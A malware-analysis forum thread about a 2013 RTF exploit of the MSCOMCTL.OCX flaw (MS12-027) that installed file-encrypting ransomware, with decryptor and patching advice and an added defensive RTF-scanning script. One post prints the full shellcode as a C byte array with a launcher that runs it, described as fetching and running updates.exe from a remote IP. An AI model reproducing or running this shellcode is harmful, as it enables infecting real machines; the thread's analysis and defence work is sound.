A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #19041  by TwinHeadedEagle
 Mon Apr 22, 2013 8:24 pm
Please merge topic if it already exists.

Came across this exploit

Virustotal report --> https://www.virustotal.com/en/file/e1d0 ... /analysis/

EDIT: Just to mention that this malware encrypted .doc .pdf .rar and similar files

I think it is PGP Coder--> http://en.m.wikipedia.org/wiki/PGPCoder

Can you tell me if it is possible to recover these corrupted files somehow?
 #19047  by EP_X0FF
 Tue Apr 23, 2013 7:38 am
The shellcode at the end of this RTF document is responsible for load/start of hxxp://85.17.207.1/updates.exe, server is down.
Whoever wants to play with this piece of crap, it is below.
Code:
unsigned char sc[758] = {
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x3C, 0x74, 0x43, 0xBE, 0x47, 0x40, 0x46, 0x05, 
	0x79, 0x0B, 0xD4, 0x0D, 0xB5, 0xB1, 0x27, 0x9F, 0x97, 0x90, 0x41, 0xB8, 0xB2, 0x24, 0x42, 0x73, 
	0x48, 0x86, 0xE0, 0x1D, 0x35, 0x76, 0x7E, 0x7C, 0x4F, 0x0C, 0x14, 0xBF, 0x93, 0x4E, 0xA8, 0x15, 
	0x98, 0x7A, 0x2F, 0xB6, 0x1B, 0xF7, 0xE1, 0x25, 0xBA, 0x13, 0xF5, 0x2C, 0xB0, 0x03, 0xFC, 0x81, 
	0xE2, 0x66, 0xA9, 0x67, 0x7B, 0x34, 0x8D, 0x71, 0x74, 0x71, 0x21, 0xC1, 0xE3, 0x7C, 0x4A, 0xB3, 
	0x8C, 0xE0, 0x75, 0x2D, 0x91, 0x98, 0x7F, 0x78, 0x76, 0x73, 0x70, 0x3A, 0xD3, 0xE2, 0x3B, 0xFC, 
	0xB4, 0x80, 0xEB, 0x49, 0x97, 0x7B, 0x3D, 0x72, 0x2D, 0x77, 0x25, 0xB3, 0x35, 0xB5, 0xB0, 0x27, 
	0x0D, 0x1D, 0x08, 0xF9, 0x85, 0xF5, 0x31, 0xD6, 0x3C, 0xA9, 0x40, 0x90, 0xB6, 0x66, 0xA8, 0x34, 
	0xB8, 0x14, 0xB9, 0x7D, 0x4A, 0x39, 0xF8, 0x3F, 0xB2, 0x2A, 0xD5, 0x18, 0xD4, 0x43, 0x2F, 0x99, 
	0x79, 0x48, 0x47, 0xB1, 0x4B, 0x7A, 0x42, 0x4E, 0x7E, 0x2B, 0xF6, 0xE1, 0x37, 0x8D, 0xBF, 0xB7, 
	0x9F, 0x05, 0xBB, 0x7C, 0x2C, 0xBE, 0x7E, 0x46, 0x7A, 0x38, 0xE2, 0x41, 0x78, 0x20, 0xD2, 0xFD, 
	0x96, 0x7B, 0x0A, 0xE0, 0x0C, 0x73, 0x1C, 0x67, 0x70, 0x04, 0x92, 0x93, 0x72, 0x24, 0x9B, 0x74, 
	0x4F, 0xBA, 0x7F, 0x28, 0xE3, 0x15, 0xB8, 0x71, 0x29, 0xE1, 0x0C, 0xB7, 0x91, 0x3C, 0x98, 0xB4, 
	0x77, 0x42, 0x67, 0xB9, 0x7D, 0x34, 0x19, 0xEB, 0x3D, 0x8D, 0x96, 0x79, 0x27, 0x05, 0x9F, 0xB2, 
	0x93, 0x75, 0x25, 0xA8, 0x15, 0x35, 0x2D, 0x46, 0xA9, 0xF5, 0xBE, 0x2F, 0xB6, 0x2C, 0x76, 0x04, 
	0x97, 0xB5, 0xBF, 0x0D, 0x99, 0xBA, 0x9B, 0xB1, 0xB3, 0x47, 0x30, 0xD6, 0xBB, 0x4B, 0x3F, 0x4E, 
	0x14, 0x1D, 0x4A, 0x90, 0x66, 0x48, 0x40, 0xD4, 0x49, 0x43, 0xFD, 0x4F, 0xFC, 0x92, 0xB0, 0x24, 
	0xF9, 0x41, 0xD5, 0x1C, 0x37, 0xF8, 0xEB, 0x04, 0xB3, 0x92, 0x0C, 0x43, 0x81, 0xC4, 0x54, 0xF2, 
	0xFF, 0xFF, 0xBA, 0x61, 0xB5, 0x1D, 0x02, 0xD9, 0xCF, 0xD9, 0x74, 0x24, 0xF4, 0x5E, 0x31, 0xC9, 
	0xB1, 0x6F, 0x83, 0xEE, 0xFC, 0x31, 0x56, 0x0F, 0x03, 0x56, 0x6E, 0x57, 0xE8, 0xFE, 0x98, 0x1E, 
	0x13, 0xFF, 0x58, 0x41, 0x9D, 0x1A, 0x69, 0x53, 0xF9, 0x6F, 0xDB, 0x63, 0x89, 0x22, 0xD7, 0x08, 
	0xDF, 0xD6, 0x6C, 0x7C, 0xC8, 0xD9, 0xC5, 0xCB, 0x2E, 0xD7, 0xD6, 0xFD, 0xEE, 0xBB, 0x14, 0x9F, 
	0x92, 0xC1, 0x48, 0x7F, 0xAA, 0x09, 0x9D, 0x7E, 0xEB, 0x74, 0x6D, 0xD2, 0xA4, 0xF3, 0xDF, 0xC3, 
	0xC1, 0x46, 0xE3, 0xE2, 0x05, 0xCD, 0x5B, 0x9D, 0x20, 0x12, 0x2F, 0x17, 0x2A, 0x43, 0x9F, 0x2C, 
	0x64, 0x7B, 0x94, 0x6B, 0x55, 0x7A, 0x79, 0x68, 0xA9, 0x35, 0xF6, 0x5B, 0x59, 0xC4, 0xDE, 0x95, 
	0xA2, 0xF6, 0x1E, 0x79, 0x9D, 0x36, 0x93, 0x83, 0xD9, 0xF1, 0x4B, 0xF6, 0x11, 0x02, 0xF6, 0x01, 
	0xE2, 0x78, 0x2C, 0x87, 0xF7, 0xDB, 0xA7, 0x3F, 0xDC, 0xDA, 0x64, 0xD9, 0x97, 0xD1, 0xC1, 0xAD, 
	0xF0, 0xF5, 0xD4, 0x62, 0x8B, 0x02, 0x5D, 0x85, 0x5C, 0x83, 0x25, 0xA2, 0x78, 0xCF, 0xFE, 0xCB, 
	0xD9, 0xB5, 0x51, 0xF3, 0x3A, 0x11, 0x0E, 0x51, 0x30, 0xB0, 0x5B, 0xE3, 0x1B, 0xDD, 0xF5, 0x89, 
	0xD7, 0x1D, 0x61, 0x25, 0x71, 0x70, 0x18, 0x40, 0x67, 0xD8, 0xB2, 0x1E, 0x1F, 0xC7, 0x45, 0x60, 
	0x0A, 0x36, 0xB6, 0xC9, 0xE2, 0x6E, 0x1F, 0xA0, 0x64, 0xAB, 0xC9, 0x35, 0xD2, 0x34, 0x20, 0x2E, 
	0x7C, 0x90, 0xFB, 0x78, 0x2C, 0x77, 0x91, 0x79, 0x9E, 0x26, 0x0F, 0x2E, 0x73, 0x99, 0xA7, 0x99, 
	0xFA, 0x86, 0xF1, 0xD9, 0x28, 0x53, 0xB2, 0x7C, 0xE2, 0x76, 0x1E, 0x17, 0x04, 0x45, 0xBE, 0x63, 
	0x56, 0xFB, 0xEC, 0x3A, 0x05, 0xAB, 0x78, 0x56, 0xFC, 0x65, 0x43, 0x57, 0x2A, 0xF0, 0x75, 0xCD, 
	0xC5, 0x58, 0x11, 0x92, 0xD5, 0x5E, 0xE1, 0x1B, 0xF9, 0x35, 0xE5, 0x4B, 0x90, 0xD6, 0xB3, 0x03, 
	0x11, 0xAF, 0xA5, 0x52, 0x26, 0xFA, 0xE8, 0xA5, 0x8E, 0x52, 0x5D, 0x0D, 0x67, 0x35, 0x4C, 0xB7, 
	0x9F, 0xBE, 0x71, 0x62, 0x1A, 0x80, 0xF8, 0x92, 0x6E, 0x0E, 0x86, 0xD1, 0x70, 0x10, 0x86, 0xC2, 
	0xA0, 0xF9, 0x09, 0x14, 0x43, 0xFA, 0xFD, 0xB9, 0xBC, 0x05, 0x02, 0xEE, 0x37, 0x8A, 0x98, 0x90, 
	0xC3, 0x0F, 0x4E, 0x36, 0x54, 0xB5, 0x8E, 0x53, 0xCF, 0x04, 0x4E, 0xFC, 0x40, 0x0D, 0x4C, 0x69, 
	0x63, 0x81, 0x3A, 0x6F, 0x09, 0x23, 0xED, 0x07, 0x17, 0xD5, 0xCB, 0x97, 0x58, 0xCF, 0x78, 0x16, 
	0x67, 0x96, 0xC6, 0x5D, 0x64, 0x7E, 0xF2, 0x0A, 0xE7, 0xCC, 0xDE, 0xBA, 0xC6, 0x0C, 0xAA, 0xB8, 
	0x78, 0xDC, 0x84, 0xD6, 0x6A, 0x48, 0xA1, 0xC5, 0x74, 0xA1, 0x34, 0xC9, 0xFF, 0x67, 0x6E, 0x4F, 
	0x3F, 0x03, 0x98, 0x25, 0xC0, 0xB8, 0xF4, 0x34, 0x84, 0x64, 0xF8, 0x16, 0x56, 0x0D, 0x2D, 0xC0, 
	0xF6, 0x96, 0xD2, 0x3B, 0x85, 0xC5, 0x28, 0x2F, 0x44, 0x46, 0x58, 0x69, 0xCF, 0xEE, 0xCA, 0x8A, 
	0x25, 0x9A, 0xEA, 0x23, 0xAE, 0x6A, 0x61, 0xA4, 0xA9, 0x72, 0xA0, 0x51, 0xB6, 0xE4, 0xBA, 0x13, 
	0x14, 0xA2, 0xC5, 0x89, 0xB1, 0xDB, 0xC6, 0xCD, 0xBD, 0xA9, 0x48, 0x56, 0x23, 0x26, 0xCD, 0xE5, 
	0x8D, 0xA3, 0x75, 0x6F, 0xD2, 0xC3, 0x82, 0x90, 0x2D, 0xEC, 0xB4, 0x5B, 0xFC, 0x22, 0xF3, 0x8D, 
	0x32, 0x75, 0xCC, 0xFF, 0x03, 0x75
};

int __cdecl main(
	VOID
	) 
{
	int (*func)();
	func = (int (*)()) sc;
	(int)(*func)();
}
 #19054  by EP_X0FF
 Tue Apr 23, 2013 9:10 am
EP_X0FF wrote: hxxp://85.17.207.1/updates.exe, server is down.
MAXS wrote: Thanks, but is it possible to recover corrupted files?
Crystal ball is not available here.
 #19062  by EP_X0FF
 Tue Apr 23, 2013 2:10 pm
This means I don't know what this updates.exe file does, as I don't have it. If it really is GpCode ransom, then say goodbye to these files: RSA-1024 + AES-256 is a dead end. You can only try to recover the original files if they were deleted by the ransom after encryption; otherwise, there is no way.
 #19070  by EP_X0FF
 Thu Apr 25, 2013 1:59 am
Try this ftp://ftp.drweb.com/pub/drweb/tools/te215decrypt.exe

Do not remove C:\crypt.txt.

If you have it, and it is unmodified, run the decryptor without parameters.
If you don't have it, try this decryptor with the parameter = ID of your system volume, which can be retrieved through the "dir" command. In some cases decryption is possible.

In general:
1) Always do a backup of your most important files;
2) Always use up-to-date, fully patched software. This particular Encoder campaign is email-based and uses a very old, already patched MSCOMCTL.OCX vulnerability. See MS12-027, KB2664258.
The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers “system state” corruption, as exploited in the wild in April 2012, aka “MSCOMCTL.OCX RCE Vulnerability.”
Install KB2597112 (Office 2003), KB2598041 (Office 2007 Suites), KB2598039 (Office 2010).
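A defender-side triage helper, added here as an example and not code from the thread: it decodes the \objdata hex blobs of an RTF, flags embedded OLE objects whose class string names the MSCOMCTL controls discussed above, and measures the data appended after the document's final brace, where the shellcode in this sample sits. The "MSComctlLib." ProgID prefix and the sample document are assumptions constructed for the demonstration.

```python
import re
from typing import Dict, List

# Added triage helper (not from the thread). Assumption: exploit objects for the
# MSCOMCTL ListView/TreeView controls carry the "MSComctlLib." ProgID prefix in
# their embedded OLE class string.
SUSPECT_CLASS = b"MSComctlLib."
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def extract_objdata(rtf: bytes) -> List[bytes]:
    """Decode every \\objdata hex blob into raw bytes (a dangling nibble is dropped)."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]
        blobs.append(bytes.fromhex(hexdata.decode("ascii")))
    return blobs


def trailing_bytes(rtf: bytes) -> int:
    """Count non-whitespace bytes after the final '}'; a clean RTF has none."""
    end = rtf.rfind(b"}")
    return 0 if end < 0 else len(rtf[end + 1:].strip())


def scan_rtf(rtf: bytes) -> Dict[str, int]:
    """Summarise the indicators a responder would look at first."""
    blobs = extract_objdata(rtf)
    return {
        "objects": len(blobs),
        "mscomctl_objects": sum(1 for b in blobs if SUSPECT_CLASS in b),
        "trailing_bytes": trailing_bytes(rtf),
    }


# Constructed sample: one embedded object naming the ListView control, followed by
# 13 bytes of filler appended after the closing brace, mimicking the layout described.
SAMPLE = (
    b"{\\rtf1{\\object\\objocx{\\*\\objdata "
    + "MSComctlLib.ListViewCtrl.2".encode().hex().encode()
    + b"}}}"
    + b"\x90" * 8 + b"\xe8\x00\x00\x00\x00"
)

if __name__ == "__main__":
    print(scan_rtf(SAMPLE))  # {'objects': 1, 'mscomctl_objects': 1, 'trailing_bytes': 13}
```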